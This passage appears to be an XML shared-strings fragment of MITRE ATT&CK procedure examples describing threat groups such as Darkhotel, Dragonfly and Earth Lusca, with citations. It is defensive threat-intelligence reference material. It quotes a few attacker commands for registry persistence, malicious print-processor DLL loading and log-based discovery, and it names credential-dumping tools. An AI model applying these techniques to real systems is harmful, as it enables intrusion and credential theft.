    <t>[DarkHydrus](https://attack.mitre.org/groups/G0079) has sent spearphishing emails with password-protected RAR archives containing malicious Excel Web Query files (.iqy). The group has also sent spearphishing emails that contained malicious Microsoft Office documents that use the “attachedTemplate” technique to load a template from a remote server.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit 42 Phishery Aug 2018)(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[DarkHydrus](https://attack.mitre.org/groups/G0079) used an open-source tool, Phishery, to inject malicious remote template URLs into Microsoft Word documents and then sent them to victims to enable [Forced Authentication](https://attack.mitre.org/techniques/T1187).(Citation: Unit 42 Phishery Aug 2018)</t>
  </si>
  <si>
    <t>[DarkHydrus](https://attack.mitre.org/groups/G0079) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [Empire](https://attack.mitre.org/software/S0363), and [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) used brute-force attack to obtain login data.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) used Bash Bunny, Raspberry Pi, netbooks or inexpensive laptops to connect to the company’s local network.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) performed port scanning to obtain the list of active services.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) scanned the network for public shared folders.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) used network sniffing to obtain login data. (Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) used ports 5190 and 7900 for shellcode listeners, and 4444, 4445, 31337 for shellcode C2.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) used PowerShell to create shellcode loaders.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) used DameWare Mini Remote Control for lateral movement.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) has obtained and used tools such as [Impacket](https://attack.mitre.org/software/S0357), [Winexe](https://attack.mitre.org/software/S0191), and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) created new services for shellcode loaders distribution.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has used code-signing certificates on its malware that are either forged due to weak keys or stolen. [Darkhotel](https://attack.mitre.org/groups/G0012) has also stolen certificates and signed backdoors and downloaders with them.(Citation: Kaspersky Darkhotel)(Citation: Securelist Darkhotel Aug 2015)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has decrypted strings and imports using RC4 during execution.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) used embedded iframes on hotel login portals to redirect selected victims to download malware.(Citation: Kaspersky Darkhotel)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has exploited Adobe Flash vulnerability CVE-2015-8651 for execution.(Citation: Microsoft DUBNIUM June 2016)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has used malware that searched for files with specific patterns.(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has used first-stage payloads that download additional malware from C2 servers.(Citation: Microsoft DUBNIUM June 2016)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has used a keylogger.(Citation: Kaspersky Darkhotel)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has sent spearphishing emails in an attempt to lure users into clicking on a malicious attachments.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has used malware that is disguised as a Secure Shell (SSH) tool.(Citation: Microsoft DUBNIUM June 2016)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has obfuscated code using RC4, XOR, and RSA.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) malware can collect a list of running processes on a system.(Citation: Securelist Darkhotel Aug 2015)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has been known to establish persistence by adding programs to the Run Registry key.(Citation: Kaspersky Darkhotel)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012)'s selective infector modifies executables stored on removable media as a method of spreading across computers.(Citation: Kaspersky Darkhotel)</t>
  </si>
  <si>
    <t xml:space="preserve">[Darkhotel](https://attack.mitre.org/groups/G0012) has searched for anti-malware strings and anti-virus processes running on the system.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM June 2016) </t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has sent spearphishing emails with malicious RAR and .LNK attachments.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has used AES-256 and 3DES for C2 communications.(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) malware has used a series of checks to determine if it's being analyzed; checks include the length of executable names, if a filename ends with &lt;code&gt;.Md5.exe&lt;/code&gt;, and if the program is executed from the root of the C:\ drive, as well as checks for sandbox-related libraries.(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015)(Citation: Microsoft DUBNIUM June 2016)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has collected the hostname, OS version, service pack version, and the processor architecture from the victim’s machine.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has collected the IP address and network adapter information from the victim’s machine.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) malware can obtain system time from a compromised host.(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) used a virus that propagates by infecting executables stored on shared drives.(Citation: Kaspersky Darkhotel)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has used malware that repeatedly checks the mouse cursor position to determine if a real user is on the system.(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) malware has employed just-in-time decryption of strings to evade sandbox detection.(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file.(Citation: Securelist Darkhotel Aug 2015)</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.(Citation: RSA Shell Crew)</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) has used &lt;code&gt;-w hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows by setting the WindowStyle parameter to hidden. (Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) has updated and modified its malware, resulting in different hash values that evade detection.(Citation: Symantec Black Vine)</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) has used PowerShell scripts to download and execute programs in memory, without writing to disk.(Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) uses the Microsoft [Tasklist](https://attack.mitre.org/software/S0057) utility to list processes running on systems.(Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) has used regsvr32.exe to execute a server variant of [Derusbi](https://attack.mitre.org/software/S0021) in victim networks.(Citation: RSA Shell Crew)</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) has used ping to identify other machines of interest.(Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) uses net.exe to connect to network shares using &lt;code&gt;net use&lt;/code&gt; commands with compromised credentials.(Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) uses Web shells on publicly accessible Web servers to access victim networks.(Citation: CrowdStrike Deep Panda Web Shells)</t>
  </si>
  <si>
    <t>The [Deep Panda](https://attack.mitre.org/groups/G0009) group is known to utilize WMI for lateral movement.(Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has added newly created accounts to the administrators group to maintain elevated access.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used SMB for C2.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has compressed data into .zip files prior to exfiltration.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has attempted to brute force credentials to gain access.(Citation: CISA AA20-296A Berserk Bear December 2020)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has collected open source information to identify relationships between organizations for targeting purposes.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used the command line for execution.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has placed trojanized installers for control system software on legitimate vendor app stores.(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has collected data from local victim systems.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has disabled host-based firewalls. The group has also globally opened port 3389.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used batch scripts to enumerate users on a victim domain controller.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used batch scripts to enumerate administrators and users in the domain.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has registered domains for targeting intended victims.(Citation: CISA AA20-296A Berserk Bear December 2020)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has compromised targets via strategic web compromise (SWC) utilizing a custom exploit kit.(Citation: Secureworks IRON LIBERTY July 2019)(Citation: US-CERT TA18-074A)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has compromised websites to redirect traffic and to host exploit kits.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has conducted SQL injection attacks, exploited vulnerabilities CVE-2019-19781 and CVE-2020-0688 for Citrix and MS Exchange, and CVE-2018-13379 for Fortinet VPNs.(Citation: CISA AA20-296A Berserk Bear December 2020)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has exploited CVE-2011-0611 in Adobe Flash Player to gain execution on a targeted system.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has exploited a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory servers.(Citation: CISA AA20-296A Berserk Bear December 2020)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used VPNs and Outlook Web Access (OWA) to maintain access to victim networks.(Citation: US-CERT TA18-074A)(Citation: CISA AA20-296A Berserk Bear December 2020)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used a batch script to gather folder and file names from victim hosts.(Citation: US-CERT TA18-074A)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.(Citation: US-CERT TA18-074A)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has modified the Registry to hide created user accounts.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has copied and installed tools for operations once in the victim environment.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has dropped and executed SecretsDump to dump password hashes.(Citation: US-CERT TA18-074A)(Citation: Core Security Impacket)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has created accounts on victims, including administrator accounts, some of which appeared to be tailored to each individual staging target.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has created a directory named "out" in the user's %AppData% folder and copied files to it.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used various forms of spearphishing in attempts to get users to open malicious attachments.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has created accounts disguised as legitimate backup and service accounts as well as an email administration account.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has modified the Registry to perform multiple techniques through the use of [Reg](https://attack.mitre.org/software/S0075).(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has dropped and executed SecretsDump to dump password hashes. They also obtained ntds.dit from domain controllers.(Citation: US-CERT TA18-074A)(Citation: Core Security Impacket)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has identified and browsed file servers in the victim network, sometimes , viewing files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has dropped and executed tools used for password cracking, including Hydra and [CrackMapExec](https://attack.mitre.org/software/S0488).(Citation: US-CERT TA18-074A)(Citation: Kali Hydra)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used PowerShell scripts for execution.(Citation: US-CERT TA18-074A)(Citation: Symantec Dragonfly Sept 2017)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has queried the Registry to identify victim information.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has added the registry value ntdll to the Registry Run key to establish persistence.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has moved laterally via RDP.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has accessed email accounts using Outlook Web Access.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has likely obtained a list of hosts in the victim environment.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil).(Citation: US-CERT TA18-074A)(Citation: Symantec Dragonfly Sept 2017)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has dropped and executed SecretsDump to dump password hashes.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has compromised legitimate websites to host C2 and malware modules.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has sent emails with malicious attachments to gain initial access.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used spearphishing with Microsoft Office attachments to enable harvesting of user credentials.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used batch scripts to enumerate network information, including information about trusts, zones, and the domain.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) used the command &lt;code&gt;query user&lt;/code&gt; on victim hosts.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has injected SMB URLs into malicious Word spearphishing attachments to initiate [Forced Authentication](https://attack.mitre.org/techniques/T1187).(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [CrackMapExec](https://attack.mitre.org/software/S0488), and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Secureworks IRON LIBERTY July 2019)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has compromised user credentials and used valid accounts for operations.(Citation: US-CERT TA18-074A)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has acquired VPS infrastructure for use in malicious campaigns.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has scanned targeted systems for vulnerable Citrix and Microsoft Exchange services.(Citation: CISA AA20-296A Berserk Bear December 2020)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has commonly created Web shells on victims' publicly accessible email and web servers, which they used to maintain access to a victim network and download additional malicious files.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used various types of scripting to perform operations, including batch scripts.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has registered domains to spoof targeted organizations by changing the top-level domain (TLD) to “.us”, “.co” or “.biz”.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has created e-mail accounts to spoof targeted organizations.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has gathered targeted individuals' e-mail addresses through open source research and website contact forms.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has used malicious documents containing exploits for CVE-2021-40444 affecting Microsoft MSHTML.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has gained execution through victims clicking on malicious LNK files contained within ISO files, which can execute hidden DLLs within the ISO.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has used malicious links to lure users into executing malicious payloads.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has searched for information on targeted individuals on business databases including RocketReach and CrunchBase.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has used contact forms on victim websites to generate phishing e-mails.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has copied data from social media sites to impersonate targeted individuals.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has established social media profiles to mimic employees of targeted companies.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) conducted an e-mail thread-hijacking campaign with malicious ISO attachments.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has relied on victims to open malicious links in e-mails for execution.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has used the e-mail notification features of legitimate file sharing services for spearphishing.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011)  has uploaded malicious payloads to file-sharing services including TransferNow, TransferXL, WeTransfer, and OneDrive.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has used file-sharing services including WeTransfer, TransferNow, and OneDrive to deliver payloads.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used WinRAR to compress stolen files into an archive prior to exfiltration.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used the Fodhelper UAC bypass technique to gain elevated privileges.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used a &lt;code&gt;DCSync&lt;/code&gt; command with [Mimikatz](https://attack.mitre.org/software/S0002) to retrieve credentials from an exploited controller.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[Earth Lusca](https://attack.mitre.org/groups/G1006) has placed a malicious payload in `%WINDIR%\SYSTEM32\oci.dll` so it would be sideloaded by the MSDTC service.(Citation: TrendMicro EarthLusca 2022) </t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used [certutil](https://attack.mitre.org/software/S0160) to decode a string into a cabinet file.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Nltest](https://attack.mitre.org/software/S0359) to obtain information about domain controllers.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[Earth Lusca](https://attack.mitre.org/groups/G1006) has registered domains, intended to look like legitimate target domains, that have been used in watering hole attacks.(Citation: TrendMicro EarthLusca 2022) </t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has performed watering hole attacks.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used the megacmd tool to upload stolen files from a victim network to MEGA.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has compromised victims by directly exploiting vulnerabilities of public-facing servers, including those associated with Microsoft Exchange and Oracle GlassFish.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Mimikatz](https://attack.mitre.org/software/S0002) to exploit a domain controller via the ZeroLogon exploit (CVE-2020-1472).(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has manipulated legitimate websites to inject malicious JavaScript code as part of their watering hole operations.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used ProcDump to obtain the hashes of credentials by dumping the memory of the LSASS process.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) required users to click on a malicious file for the loader to activate.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006)  has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired and used a variety of malware, including [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) used the command `move [file path] c:\windows\system32\spool\prtprocs\x64\spool.dll` to move and register a malicious DLL name as a Windows print processor, which eventually was loaded by the Print Spooler service.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) modified the registry using the command &lt;code&gt;reg add “HKEY_CURRENT_USER\Environment” /v UserInitMprLogonScript /t REG_SZ /d “[file path]”&lt;/code&gt; for persistence.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used `mshta.exe` to load an HTA script within a malicious .LNK file.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) used Base64 to encode strings.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used PowerShell to execute commands.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has added the Registry key `HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\UDPrint” /v Driver /d “spool.dll /f` to load malware as a Print Processor.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Tasklist](https://attack.mitre.org/software/S0057) to obtain information from a compromised host.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) adopted Cloudflare as a proxy for compromised servers.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) used Python scripts for port scanning or building reverse shells.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) used the command &lt;code&gt;powershell “Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -
property * | findstr “Address””&lt;/code&gt; to find the network information of successfully logged-in accounts to discovery addresses of other machines. [Earth Lusca](https://attack.mitre.org/groups/G1006) has also used multiple scanning tools to discover other machines within the same compromised network.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has dropped an SSH-authorized key in the `/root/.ssh` folder in order to access a compromised server with SSH.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
